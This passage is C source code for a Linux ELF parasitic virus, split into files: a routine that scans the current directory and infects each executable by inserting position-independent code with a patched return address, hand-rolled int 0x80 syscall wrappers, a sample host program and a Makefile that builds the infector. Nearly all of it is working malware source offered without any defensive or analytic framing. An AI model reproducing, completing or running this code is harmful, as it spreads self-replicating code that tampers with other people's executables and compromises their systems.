stat.st_size); g_close(fd); if (g_rename(tmpfile, file) == -1) { goto err; } return 0; err: if (tmp_fd != -1) g_close(tmp_fd); if (ehdr) g_munmap(ehdr, stat.st_size); if (fd != -1) g_close(fd); return -1; } static inline void virus_code(void) { char dirdata[4096]; struct dirent *dirp; int curfd; int nbyte, c; unsigned long para_code_start_addr; __asm__ volatile ( "push %%eax\n\t" "push %%ecx\n\t" "push %%edx\n\t" ::); char curdir[2] = {'.', 0}; char newline = '\n'; curdir[0] = '.'; curdir[1] = 0; newline = '\n'; if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0) goto out; /* Get start address of virus code */ __asm__ volatile ( "jmp get_start_addr\n" "infect_start:\n\t" "popl %0\n\t" :"=m" (para_code_start_addr) :); para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1; /* Infecting */ while ((nbyte = g_getdents(curfd, (struct dirent *) &dirdata, sizeof(dirdata))) > 0) { c = 0; dirp = (struct dirent *) &dirdata; do { V_DEBUG_WRITE(1, dirp->d_name, dirp->d_reclen - (unsigned long) &(((struct dirent *) 0)->d_name)); V_DEBUG_WRITE(1, &newline, sizeof(newline)); infect_virus(dirp->d_name, (void *) para_code_start_addr, PARACODE_LENGTH, PARACODE_RETADDR_ADDR_OFFSET); c += dirp->d_reclen; if (c >= nbyte) break; dirp = (struct dirent *)((char *)dirp + dirp->d_reclen); } while (1); } g_close(curfd); out: __asm__ volatile ( "popl %%edx\n\t" "popl %%ecx\n\t" "popl %%eax\n\t" "addl $0x102c, %%esp\n\t" "popl %%ebx\n\t" "popl %%esi\n\t" "popl %%edi\n\t" "popl %%ebp\n\t" "jmp return\n" "get_start_addr:\n\t" "call infect_start\n" "return:\n\t" "push $0xAABBCCDD\n\t" /* push ret_addr */ "ret\n" ::); } void parasite_code(void) { virus_code(); } void parasite_code_end(void)  ------------------------------ gvirus.c ------------------------------ ------------------------------ gunistd.h ------------------------------ #ifndef _G2_UNISTD_ #define _G2_UNISTD_ #define g__syscall_return(type, res) \ do { \ if ((unsigned long)(res) >= (unsigned long)(-125)) { \ res = -1; \ } \ return (type) (res); \ } while (0) #define g_syscall0(type,name) \ type g_##name(void) \ { \ long __res; \ __asm__ volatile ("int $0x80" \ : "=a" (__res) \ : "0" (__NR_##name)); \ g__syscall_return(type,__res); \ } #define g_syscall1(type,name,type1,arg1) \ type g_##name(type1 arg1) \ { \ long __res; \ __asm__ volatile ("int $0x80" \ : "=a" (__res) \ : "0" (__NR_##name),"b" ((long)(arg1))); \ g__syscall_return(type,__res); \ } #define g_syscall2(type,name,type1,arg1,type2,arg2) \ type g_##name(type1 arg1,type2 arg2) \ { \ long __res; \ __asm__ volatile ("int $0x80" \ : "=a" (__res) \ : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \ g__syscall_return(type,__res); \ } #define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \ type g_##name(type1 arg1,type2 arg2,type3 arg3) \ { \ long __res; \ __asm__ volatile ("int $0x80" \ : "=a" (__res) \ : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \ "d" ((long)(arg3))); \ g__syscall_return(type,__res); \ } #define g_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \ type g_##name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \ { \ long __res; \ __asm__ volatile ("int $0x80" \ : "=a" (__res) \ : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \ "d" ((long)(arg3)),"S" ((long)(arg4))); \ g__syscall_return(type,__res); \ } #define g_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \ type5,arg5) \ type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \ { \ long __res; \ __asm__ volatile ("int $0x80" \ : "=a" (__res) \ : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \ "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5))); \ g__syscall_return(type,__res); \ } #define g_syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \ type5,arg5,type6,arg6) \ type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \ { \ long __res; \ __asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \ : "=a" (__res) \ : "i" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \ "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)), \ "0" ((long)(arg6))); \ g__syscall_return(type,__res); \ } #endif /* _G2_UNISTD_ */ ------------------------------ gunistd.h ------------------------------ ------------------------------ gsyscall.h ------------------------------ #ifndef _G2_SYSCALL_ #define _G2_SYSCALL_ #include  #include  #include  #include  #include "gunistd.h" #define NULL 0 struct dirent { long d_ino; unsigned long d_off; unsigned short d_reclen; char d_name[256]; /* We must not include limits.h! */ }; struct stat { unsigned long st_dev; unsigned long st_ino; unsigned short st_mode; unsigned short st_nlink; unsigned short st_uid; unsigned short st_gid; unsigned long st_rdev; unsigned long st_size; unsigned long st_blksize; unsigned long st_blocks; unsigned long st_atime; unsigned long st_atime_nsec; unsigned long st_mtime; unsigned long st_mtime_nsec; unsigned long st_ctime; unsigned long st_ctime_nsec; unsigned long __unused4; unsigned long __unused5; }; static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count); static inline g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count); static inline g_syscall3(int, open, const char *, file, int, flag, int, mode); static inline g_syscall1(int, close, int, fd); static inline g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot, int, flags, int, fd, off_t, offset); static inline g_syscall2(int, munmap, void *, addr, size_t, len); static inline g_syscall2(int, rename, const char *, oldpath, const char *, newpath); static inline g_syscall2(int, fstat, int, filedes, struct stat *, buf); static inline void * __memcpy(void * to, const void * from, size_t n) { int d0, d1, d2; __asm__ __volatile__( "rep ; movsl\n\t" "testb $2,%b4\n\t" "je 1f\n\t" "movsw\n" "1:\ttestb $1,%b4\n\t" "je 2f\n\t" "movsb\n" "2:" : "=&c" (d0), "=&D" (d1), "=&S" (d2) :"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from) : "memory"); return (to); } #endif /* _G2_SYSCALL_ */ ------------------------------ gsyscall.h ------------------------------ ------------------------------ foo.c ------------------------------ #include  int main() { puts("real elf point"); return 0; } ------------------------------ foo.c ------------------------------ ------------------------------ Makefile ------------------------------ all: foo gei gei: g-elf-infector.c gvirus.o gcc -O2 $< gvirus.o -o gei -Wall -DNDEBUG foo: foo.c gcc $< -o foo gvirus.o: gvirus.c gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall -DNDEBUG clean: rm *.o -rf rm foo -rf rm gei -rf ------------------------------ Makefile ------------------------------ 文字

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